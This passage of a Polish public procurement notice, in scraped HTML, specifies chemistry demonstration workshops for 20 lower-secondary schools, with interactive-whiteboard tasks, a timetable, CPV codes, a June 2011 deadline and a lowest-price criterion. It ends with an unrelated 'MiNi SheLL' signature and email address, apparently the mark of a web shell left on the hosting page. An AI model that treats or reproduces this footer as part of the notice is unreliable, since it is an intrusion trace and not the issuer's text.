- reakcje otrzymywania tlenku węgla(IV) (np.: z reakcji kwasu octowego z sodą oczyszczoną),
- spalanie pierwiastków w tlenie (siarki, fosforu, węgla),
- badanie właściwości węgla (jego rola w przyrodzie i zastosowanie w nanotechnologii - np. nanorurki <Nobel z Fizyki 2010>),
- współczesne ogniwa paliwowe (nowoczesne technologie, prezentacja mechanizmu działania urządzeń napędzanych w wyniku reakcji elektrolizy),
- doświadczenia z użyciem katalizatorów (np.: katalityczne rozkłady roztworu nadtlenku wodoru, współczesne katalizatory - biokatalizatory <jak działają, jak je otrzymać>).
uczeń musi mieć również umożliwioną pracę z tablicą interaktywną (gry dydaktyczne, krzyżówki, szarady, łamigłówki, plansze interaktywne) oraz pracę z systemem bezprzewodowego głosowania (ankiety, quizy). Zadania interaktywne muszą stanowić oprawę dydaktyczną do pokazu.  
c)	wykorzystać możliwości tablicy interaktywnej w trakcie prowadzonych zajęć oraz zapewnić w części warsztatowej samodzielne wykonanie eksperymentów przez uczniów, a także udzielić wyjaśnień dotyczących nurtujących ich problemów,
d)	zapewnić urządzenia oraz materiały używane do wykonywanych ćwiczeń i prowadzenia warsztatów,
e)	przygotować Harmonogram zajęć  realizowanych w 20 szkołach gimnazjalnych oraz przekazać Zamawiającemu w terminie 2 tygodni od daty podpisania umowy,
f)	przekazać każdemu uczniowi broszury z omówieniem prezentowanych doświadczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com